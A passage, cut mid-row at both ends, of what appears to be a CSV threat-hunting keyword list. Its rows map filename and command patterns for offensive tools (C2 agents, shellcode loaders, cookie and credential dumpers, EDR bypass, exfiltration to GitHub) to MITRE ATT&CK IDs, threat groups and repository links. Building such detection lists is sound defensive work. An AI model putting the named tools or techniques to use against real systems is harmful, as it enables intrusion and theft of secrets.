TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*execute_pe -PE*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*execute_Pezor*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*execute_shellcode *,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*Execute-ACLight.bat*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Execute-ACLight2.bat*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*execute-assembly *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*execute-assembly *.exe *,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*execute-assembly *asreproast*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*execute-assembly *kerberoast*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*execute-assembly SharpBlock*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*execute-assembly*Seatbelt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*execute-assembly*sharpcookiemonster*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*execute-assembly*sigflip*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*ExecuteAssembly.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*executeAssembly.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*execute-assembly.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Execute-Command-MSSQL*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Execute-DNSTXT-Code*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*execute-dotnet-assembly*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*execute-pe.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*executepersistence*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*execute-Pezor*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*execute-shellcode.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackCreateThreadpoolWait.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackCreateTimerQueue.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackEnumChildWindows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackEnumWindows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_DirectConnectReverseHTTPS.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_DirectConnectReverseTCPRc4.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_FakePPID.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_LinuxBaseShellcodeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_LinuxSelfGuardLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_NtCreateSection.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_Syscall_inject.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_VSSyscallProject.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*-ExecutionPolicy Bypass -File Win10.ps1 *,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*-ExecutionPolicy Bypass -File Win11.ps1 *,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*exegol4thewin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolController.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*exegol-docker-build*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolExceptions.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Exegol-images-main*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolManager.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolProgress.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolPrompt.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExeStager.csproj*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*ExeToInjectInTo.*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ExeToLaunch StringToBePutAsCmdline*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*ExetoText.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*ExfilDataToGitHub*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 